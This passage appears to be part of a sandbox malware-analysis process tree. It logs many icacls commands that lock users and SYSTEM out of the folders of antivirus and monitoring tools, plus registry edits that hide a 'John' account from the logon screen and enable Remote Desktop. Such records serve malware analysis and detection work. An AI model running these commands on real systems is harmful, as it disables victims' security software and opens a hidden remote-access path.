      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4756
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6244
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5464
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6252
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5696
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1072
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:6140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6720
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:1512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6684
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6716
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:6808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6840
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:4600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3656
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5656
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5144
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5916
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1764
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      PID:5884
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:4892
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1332
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:3276
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:4348
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1804
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      PID:2876
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:1096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5292
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2760
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4412
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4536
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6092
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6096
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4904
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
      4⤵
      PID:3224
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
        5⤵
        
        PID:2856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
      4⤵
      PID:6320
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        5⤵
        
        PID:5584
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
      4⤵
      PID:2288
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
        5⤵
        
        PID:4676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5072
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:6152
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:6324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3684
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:6372
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3908
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6416
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
      4⤵
      PID:1408
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:6380
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1548
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6616
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6572
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
      4⤵
      PID:3260
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:3596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6580
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:5972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
      4⤵
      PID:2644
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6224
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6340
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
      4⤵
      PID:6220
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:4248
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1216
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1088
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6284
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:6124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2444
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:448
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:5716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2832
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:852
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4476
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1928
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:672
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1788
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1648
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:6756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6864
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2188
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:4280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:2336
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6896
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:7044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
      4⤵
      PID:5460
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6444
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
      4⤵
      PID:7160
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:7072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5780
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:6252
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
      4⤵
      PID:7052
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:4472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5804
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6728
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
      4⤵
      PID:5644
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:7136
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5704
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
      4⤵
      PID:5636
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2592
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3656
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
      4⤵
      PID:6188
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5040
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3048
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:4748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:2604
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2688
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:456
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:1468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
      4⤵
      PID:4632
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3276
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:1032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4072
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4612
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
      4⤵
      PID:1704
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:1100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2628
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6088
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:4904
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5788
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2132
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4052
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:3224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5864
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1212
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:6500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6072
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6232
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6396
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:4320
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5028
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2452
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:6820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6468
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GPU Temp" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5720
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6572
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\GPU Temp" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:3708
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\CPUID\HWMonitor" /deny "%username%":(OI)(CI)(F)
